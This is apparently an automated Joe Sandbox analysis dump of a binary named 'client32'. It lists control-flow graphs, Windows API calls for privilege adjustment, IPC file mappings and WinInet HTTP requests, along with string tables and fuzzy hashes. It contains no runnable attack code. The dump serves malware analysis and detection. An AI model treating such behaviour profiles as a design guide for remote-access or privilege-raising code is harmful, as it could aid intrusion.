865->846 865->858 871 1109eacf-1109eaee GetLastError * 2 call 110d6c20 868->871 872 1109eaf1-1109eaf9 868->872 869->868 871->872 874 1109eafb 872->874 875 1109eb01-1109eb12 CreateEventA 872->875 874->875 877 1109eb34-1109eb42 875->877 878 1109eb14-1109eb31 GetLastError * 2 call 110d6c20 875->878 879 1109eb44-1109eb45 LocalFree 877->879 880 1109eb47-1109eb4f 877->880 878->877 879->880 882 1109eb51-1109eb52 LocalFree 880->882 883 1109eb54-1109eb5d 880->883 882->883 885 1109eb63-1109eb66 883->885 886 1109ec07-1109ec19 call 110d6c20 883->886 885->886 888 1109eb6c-1109eb6f 885->888 886->819 888->886 890 1109eb75-1109eb78 888->890 890->886 891 1109eb7e-1109eb81 890->891 892 1109eb8c-1109eba8 CreateThread 891->892 893 1109eb83-1109eb89 GetCurrentThreadId 891->893 894 1109ebaa-1109ebb4 892->894 895 1109ebb6-1109ebc0 892->895 893->892 894->819 896 1109ebda-1109ec05 SetEvent call 110d6c20 call 1109d8f0 895->896 897 1109ebc2-1109ebd8 ResetEvent * 3 895->897 896->780 897->896
                                                                                        APIs
                                                                                          • Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,B24479DC,00080000,00000000,?), ref: 1109D88D
                                                                                          • Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
                                                                                          • Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
                                                                                          • Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,B24479DC,00080000,00000000,?), ref: 1109E645
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
                                                                                        • GetVersionExA.KERNEL32(?), ref: 1109E680
                                                                                        • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
                                                                                        • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
                                                                                        • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
                                                                                        • CreateFileMappingA.KERNEL32 ref: 1109E750
                                                                                        • GetLastError.KERNEL32 ref: 1109E75D
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E786
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E793
                                                                                        • GetLastError.KERNEL32 ref: 1109E7B0
                                                                                        • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E7F9
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E806
                                                                                          • Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 1109D7D8
                                                                                          • Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA,00000000,?,1109E6BC,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D824
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E8FB
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E908
                                                                                        • _memset.LIBCMT ref: 1109E920
                                                                                        • GetTickCount.KERNEL32 ref: 1109E928
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 1109E9D4
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
                                                                                        • GetLastError.KERNEL32 ref: 1109EA44
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109EA4B
                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
                                                                                        • GetLastError.KERNEL32 ref: 1109EA89
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109EA90
                                                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
                                                                                        • GetLastError.KERNEL32 ref: 1109EACF
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109EAD6
                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
                                                                                        • GetLastError.KERNEL32 ref: 1109EB1A
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109EB1D
                                                                                        • LocalFree.KERNEL32(?), ref: 1109EB45
                                                                                        • LocalFree.KERNEL32(?), ref: 1109EB52
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1109EB83
                                                                                        • CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
                                                                                        • ResetEvent.KERNEL32(?), ref: 1109EBCC
                                                                                        • ResetEvent.KERNEL32(?), ref: 1109EBD2
                                                                                        • ResetEvent.KERNEL32(?), ref: 1109EBD8
                                                                                        • SetEvent.KERNEL32(?), ref: 1109EBDE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                        • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                        • API String ID: 3291243470-2792520954
                                                                                        • Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                        • Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
                                                                                        • Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
                                                                                        • Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 902 11029bb0-11029c3e LoadLibraryA 903 11029c41-11029c46 902->903 904 11029c48-11029c4b 903->904 905 11029c4d-11029c50 903->905 906 11029c65-11029c6a 904->906 907 11029c52-11029c55 905->907 908 11029c57-11029c62 905->908 909 11029c99-11029ca5 906->909 910 11029c6c-11029c71 906->910 907->906 908->906 913 11029d4a-11029d4d 909->913 914 11029cab-11029cb7 call 11163a11 909->914 911 11029c73-11029c8a GetProcAddress 910->911 912 11029c8c-11029c8f InternetCloseHandle 910->912 911->912 918 11029c91-11029c93 SetLastError 911->918 912->909 916 11029d68-11029d80 InternetOpenA 913->916 917 11029d4f-11029d66 GetProcAddress 913->917 919 11029cbc-11029cc3 914->919 921 11029da4-11029db0 call 11163aa5 916->921 917->916 920 11029d99-11029da1 SetLastError 917->920 918->909 922 11029ce4-11029cf0 919->922 923 11029cc5-11029cde GetProcAddress 919->923 920->921 929 11029db6-11029de7 call 11142e60 call 11165250 921->929 930 1102a02a-1102a034 921->930 928 11029cf2-11029cfb GetLastError 922->928 931 11029d11-11029d13 922->931 923->922 925 11029d82-11029d8a SetLastError 923->925 925->928 928->931 932 11029cfd-11029d0f call 11163aa5 call 11163a11 928->932 952 11029de9-11029dec 929->952 953 11029def-11029e04 call 11081d30 * 2 929->953 930->903 933 1102a03a 930->933 937 11029d30-11029d3c 931->937 938 11029d15-11029d2e GetProcAddress 931->938 932->931 936 1102a04c-1102a04f 933->936 941 1102a051-1102a056 936->941 942 1102a05b-1102a05e 936->942 937->913 954 11029d3e-11029d47 937->954 938->937 943 11029d8f-11029d97 SetLastError 938->943 947 1102a1bf-1102a1c7 941->947 948 1102a060-1102a065 942->948 949 1102a06a 942->949 943->913 957 1102a1d0-1102a1e3 947->957 958 1102a1c9-1102a1ca FreeLibrary 947->958 951 1102a18f-1102a194 948->951 955 1102a06d-1102a075 949->955 962 1102a196-1102a1ad GetProcAddress 951->962 963 1102a1af-1102a1b5 951->963 952->953 975 11029e06-11029e0a 953->975 976 11029e0d-11029e19 953->976 954->913 960 1102a077-1102a08e GetProcAddress 955->960 961 1102a094-1102a0a2 955->961 958->957 960->961 965 1102a14e-1102a150 SetLastError 960->965 970 1102a156-1102a15d 961->970 972 1102a0a8-1102a0ad 961->972 962->963 966 1102a1b7-1102a1b9 SetLastError 962->966 963->947 965->970 966->947 973 1102a16c-1102a18d call 11027f00 * 2 970->973 972->973 977 1102a0b3-1102a0ef call 11110230 call 11027eb0 972->977 973->951 975->976 979 11029e44-11029e49 976->979 980 11029e1b-11029e1d 976->980 1004 1102a101-1102a103 977->1004 1005 1102a0f1-1102a0f4 977->1005 986 11029e4b-11029e5c GetProcAddress 979->986 987 11029e5e-11029e75 InternetConnectA 979->987 983 11029e34-11029e3a 980->983 984 11029e1f-11029e32 GetProcAddress 980->984 983->979 984->983 992 11029e3c-11029e3e SetLastError 984->992 986->987 988 11029ea1-11029eac SetLastError 986->988 989 1102a017-1102a027 call 11162777 987->989 990 11029e7b-11029e7e 987->990 988->989 989->930 994 11029e80-11029e82 990->994 995 11029eb9-11029ec1 990->995 992->979 999 11029e84-11029e97 GetProcAddress 994->999 1000 11029e99-11029e9f 994->1000 1002 11029ec3-11029ed7 GetProcAddress 995->1002 1003 11029ed9-11029ef4 HttpOpenRequestA 995->1003 999->1000 1008 11029eb1-11029eb3 SetLastError 999->1008 1000->995 1002->1003 1009 11029ef6-11029efe SetLastError 1002->1009 1010 11029f01-11029f04 1003->1010 1006 1102a105 1004->1006 1007 1102a10c-1102a111 1004->1007 1005->1004 1011 1102a0f6-1102a0fa 1005->1011 1006->1007 1012 1102a113-1102a129 call 110d12e0 1007->1012 1013 1102a12c-1102a12e 1007->1013 1008->995 1009->1010 1015 1102a012-1102a015 1010->1015 1016 11029f0a-11029f0f 1010->1016 1011->1004 1017 1102a0fc 1011->1017 1012->1013 1020 1102a130-1102a132 1013->1020 1021 1102a134-1102a145 call 11162777 1013->1021 1015->989 1019 1102a03c-1102a049 call 11162777 1015->1019 1022 11029f11-11029f28 GetProcAddress 1016->1022 1023 11029f2a-11029f36 HttpSendRequestA 1016->1023 1017->1004 1019->936 1020->1021 1027 1102a15f-1102a169 call 11162777 1020->1027 1021->973 1036 1102a147-1102a149 1021->1036 1022->1023 1024 11029f38-11029f40 SetLastError 1022->1024 1025 11029f42-11029f5b GetLastError 1023->1025 1024->1025 1030 11029f76-11029f8b 1025->1030 1031 11029f5d-11029f74 GetProcAddress 1025->1031 1027->973 1039 11029f95-11029fa3 GetLastError 1030->1039 1031->1030 1035 11029f8d-11029f8f SetLastError 1031->1035 1035->1039 1036->955 1040 11029fa5-11029faa 1039->1040 1041 11029fac-11029fb8 GetDesktopWindow 1039->1041 1040->1041 1042 1102a002-1102a007 1040->1042 1043 11029fd3-11029fef 1041->1043 1044 11029fba-11029fd1 GetProcAddress 1041->1044 1042->1015 1045 1102a009-1102a00f 1042->1045 1043->1015 1048 11029ff1 1043->1048 1044->1043 1046 11029ff6-1102a000 SetLastError 1044->1046 1045->1015 1046->1015 1048->1010
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(WinInet.dll), ref: 11029BE5
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                        • InternetCloseHandle.WININET(000000FF), ref: 11029C8D
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                        • _malloc.LIBCMT ref: 11029CB7
                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                        • GetLastError.KERNEL32 ref: 11029CF2
                                                                                        • _free.LIBCMT ref: 11029CFE
                                                                                        • _malloc.LIBCMT ref: 11029D07
                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                        • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                        • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                        • _free.LIBCMT ref: 11029DA5
                                                                                          • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                          • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                        • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                        • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                        • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                        • HttpOpenRequestA.WININET(?,GET,1119A6D8,00000000,00000000,00000000,8040F000,00000000), ref: 11029EEF
                                                                                        • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable,?), ref: 1102A083
                                                                                        • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle,?,1117FC4B), ref: 1102A1A2
                                                                                        • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                        • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$CloseConnectHandleHeapHttpLoadRequest
                                                                                        • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                        • API String ID: 2589145992-913974648
                                                                                        • Opcode ID: cfef3842b7233c639300b4b3baa36030b4a6cf3fe6308119353442e5a9ff000f
                                                                                        • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                        • Opcode Fuzzy Hash: cfef3842b7233c639300b4b3baa36030b4a6cf3fe6308119353442e5a9ff000f
                                                                                        • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                        APIs
                                                                                        • GetSystemMetrics.USER32(0000004C,?,00000000,?,1104C49F), ref: 1111C9E2
                                                                                        • SystemParametersInfoA.USER32(00000025,00000000,00000000,00000000), ref: 1111C9F8
                                                                                        • SystemParametersInfoA.USER32(00000026,00000000,0201E230,00000000), ref: 1111CA0A
                                                                                        • SystemParametersInfoA.USER32(00000049,00000008,00000008,00000000), ref: 1111CA60
                                                                                        • SystemParametersInfoA.USER32(00000048,00000008,00000008,00000000), ref: 1111CA75
                                                                                        • SystemParametersInfoA.USER32(00001002,00000000,0201E240,00000000), ref: 1111CAD9
                                                                                        • SystemParametersInfoA.USER32(00001005,00000000,00000000,00000000), ref: 1111CB1F
                                                                                        • SystemParametersInfoA.USER32(00001004,00000000,0201E238,00000000), ref: 1111CB37
                                                                                        • SystemParametersInfoA.USER32(00001007,00000000,00000000,00000000), ref: 1111CB7D
                                                                                        • SystemParametersInfoA.USER32(00001006,00000000,0201E23C,00000000), ref: 1111CB95
                                                                                        • SystemParametersInfoA.USER32(0000101B,00000000,00000000,00000000), ref: 1111CBDB
                                                                                        • SystemParametersInfoA.USER32(0000101A,00000000,0201E244,00000000), ref: 1111CBF3
                                                                                        • SystemParametersInfoA.USER32(00001015,00000000,00000000,00000000), ref: 1111CC39
                                                                                        • SystemParametersInfoA.USER32(00001014,00000000,0201E248,00000000), ref: 1111CC51
                                                                                        • SystemParametersInfoA.USER32(00001017,00000000,00000000,00000000), ref: 1111CC97
                                                                                        • SystemParametersInfoA.USER32(00001016,00000000,0201E24C,00000000), ref: 1111CCAF
                                                                                        • SystemParametersInfoA.USER32(00001025,00000000,00000000,00000000), ref: 1111CCF5
                                                                                        • SystemParametersInfoA.USER32(00001024,00000000,0201E250,00000000), ref: 1111CD0D
                                                                                        • SystemParametersInfoA.USER32(00001009,00000000,00000000,00000000), ref: 1111CDBF
                                                                                        • SystemParametersInfoA.USER32(00001008,00000000,0201E258,00000000), ref: 1111CDD7
                                                                                        • SystemParametersInfoA.USER32(0000004B,00000000,00000000,00000000), ref: 1111CE1A
                                                                                        • SystemParametersInfoA.USER32(0000004A,00000000,0201E25C,00000000), ref: 1111CE2F
                                                                                        • SystemParametersInfoA.USER32(00001003,00000000,00000000,00000000), ref: 1111CAC1
                                                                                          • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: System$InfoParameters$Metrics__wcstoi64
                                                                                        • String ID: EnableAnimation$EnableCBAnimation$EnableDragFullWindows$EnableDropShadow$EnableFontSmoothing$EnableGradientCaptions$EnableIESmoothScroll$EnableLBSmoothScroll$EnableLVAlphaSelect$EnableLVShadow$EnableLVWatermark$EnableMenuAnimation$EnableSelectionFade$EnableShadowCursor$EnableTBAnimations$EnableTTAnimation$EnableTVSmoothScroll$ListviewAlphaSelect$ListviewShadow$ListviewWatermark$SmoothScroll$TaskbarAnimations
                                                                                        • API String ID: 3799663137-3751266815
                                                                                        • Opcode ID: 7afb75842df2fa02927a322bd8ba874c8cab00f1a92636f1ff989c1c2fd4013b
                                                                                        • Instruction ID: bf678e33c67380cbbf5bb6d1fd1adca19844daef576a9ba588db8e9803c6ea1e
                                                                                        • Opcode Fuzzy Hash: 7afb75842df2fa02927a322bd8ba874c8cab00f1a92636f1ff989c1c2fd4013b
                                                                                        • Instruction Fuzzy Hash: 2612A631600B42AAF720CF76CE44FABFBB5EB84B44F40442CA5469E5C8DAB4F441C799
                                                                                        APIs
                                                                                          • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                          • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                        • _fgets.LIBCMT ref: 110628E2
                                                                                        • _strpbrk.LIBCMT ref: 11062949
                                                                                        • _fgets.LIBCMT ref: 11062A4C
                                                                                        • _strpbrk.LIBCMT ref: 11062AC3
                                                                                        • __wcstoui64.LIBCMT ref: 11062ADC
                                                                                        • _fgets.LIBCMT ref: 11062B55
                                                                                        • _strpbrk.LIBCMT ref: 11062B7B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                        • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                        • API String ID: 716802716-1571441106
                                                                                        • Opcode ID: fb06b02e58a3ad807d677c23ae840841415c87d799d4b15b11cd27735a5ccb1e
                                                                                        • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                                        • Opcode Fuzzy Hash: fb06b02e58a3ad807d677c23ae840841415c87d799d4b15b11cd27735a5ccb1e
                                                                                        • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1918 11139ed0-11139f05 1919 11139f12-11139f19 1918->1919 1920 11139f07-11139f0d GetCurrentThreadId 1918->1920 1921 11139f20-11139f3c call 11134830 call 11134310 1919->1921 1922 11139f1b call 11029950 1919->1922 1920->1919 1928 11139f42-11139f48 1921->1928 1929 1113a01b-1113a022 1921->1929 1922->1921 1932 1113a59a-1113a5b5 call 11162bb7 1928->1932 1933 11139f4e-11139faf call 11139a70 IsWindow IsWindowVisible call 11147060 call 1105e820 IsWindowVisible 1928->1933 1930 1113a0da-1113a0f0 1929->1930 1931 1113a028-1113a02f 1929->1931 1943 1113a0f6-1113a0fd 1930->1943 1944 1113a22f 1930->1944 1931->1930 1935 1113a035-1113a03c 1931->1935 1965 1113a011 1933->1965 1966 11139fb1-11139fb7 1933->1966 1935->1930 1938 1113a042-1113a051 FindWindowA 1935->1938 1938->1930 1942 1113a057-1113a05c IsWindowVisible 1938->1942 1942->1930 1946 1113a05e-1113a065 1942->1946 1947 1113a0ff-1113a109 1943->1947 1948 1113a10e-1113a12e call 1105e820 1943->1948 1949 1113a231-1113a242 1944->1949 1950 1113a275-1113a280 1944->1950 1946->1930 1954 1113a067-1113a08c call 11139a70 IsWindowVisible 1946->1954 1947->1950 1948->1950 1971 1113a134-1113a163 1948->1971 1956 1113a244-1113a254 1949->1956 1957 1113a25a-1113a26f 1949->1957 1951 1113a282-1113a2a2 call 1105e820 1950->1951 1952 1113a2b6-1113a2bc 1950->1952 1973 1113a2b0 1951->1973 1974 1113a2a4-1113a2ae call 1102d750 1951->1974 1960 1113a2be-1113a2ca call 11139a70 1952->1960 1961 1113a2cd-1113a2d5 1952->1961 1954->1930 1977 1113a08e-1113a09d IsIconic 1954->1977 1956->1957 1957->1950 1960->1961 1969 1113a2e7 1961->1969 1970 1113a2d7-1113a2e2 call 1106c340 1961->1970 1965->1929 1966->1965 1975 11139fb9-11139fd0 call 11147060 GetForegroundWindow 1966->1975 1979 1113a2e7 call 1112ddd0 1969->1979 1970->1969 1985 1113a165-1113a179 call 11081d30 1971->1985 1986 1113a17e-1113a191 call 11143e00 1971->1986 1973->1952 1974->1952 1997 11139fd2-11139ffc EnableWindow call 11132120 * 2 EnableWindow 1975->1997 1998 11139ffe-1113a000 1975->1998 1977->1930 1983 1113a09f-1113a0ba GetForegroundWindow call 11132120 * 2 1977->1983 1980 1113a2ec-1113a2f2 1979->1980 1987 1113a2f4-1113a2fa call 11132a10 1980->1987 1988 1113a2fd-1113a306 1980->1988 2019 1113a0cb-1113a0d4 EnableWindow 1983->2019 2020 1113a0bc-1113a0c2 1983->2020 1985->1986 2011 1113a17b 1985->2011 2012 1113a193-1113a1a4 GetLastError call 11147060 1986->2012 2013 1113a1ae-1113a1b5 1986->2013 1987->1988 1995 1113a314 call 111326b0 1988->1995 1996 1113a308-1113a30b 1988->1996 2005 1113a319-1113a31f 1995->2005 1996->2005 